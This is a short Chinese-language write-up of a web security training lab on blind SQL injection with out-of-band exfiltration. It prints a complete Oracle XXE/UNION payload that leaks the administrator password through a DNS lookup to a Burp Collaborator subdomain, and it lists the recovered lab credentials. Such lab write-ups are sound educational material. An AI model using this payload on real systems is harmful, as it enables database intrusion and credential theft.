Web SQL injection Lab17

# Web SQL injection Lab17 這題是進階版的盲注 + Out-of-Band 資料外洩（Data Exfiltration），關鍵在於：不只是讓伺服器去查 Collaborator，而是讓它把密碼資料塞進查詢的子網域，讓你在 Burp Collaborator 裡看到完整的資料。 --- 一樣先進入網站並攔截請求。 ![image](https://hackmd.io/_uploads/ry0YEraVll.png) ![image](https://hackmd.io/_uploads/SJQoNHpEgl.png) 然後獲得專屬的 Collaborator 子網域。 ![image](https://hackmd.io/_uploads/Bki2HH6Ngx.png) ``` h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com ``` 接下來要發出 DNS 查詢。 ``` '+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.abc123xyz.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- ``` :::info 因為要查詢密碼，所以在後面再塞一段密碼查詢語法。 ``` '||(SELECT+password+FROM+users+WHERE+username='administrator')||' ``` ::: 放入我們的子網域： ``` '+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- ``` ![image](https://hackmd.io/_uploads/BJWWVUTVgx.png) 成功送出後，我們到 Collaborator 中點 Poll now，就可以看到我們剛剛的 DNS 查詢紀錄。 ![image](https://hackmd.io/_uploads/BJpyNI6Ele.png) 把帳密拿去登入就可以完成本題。 `administra:hdch58dbionbxsfagrze` ![image](https://hackmd.io/_uploads/HJZoVUTVee.png) ---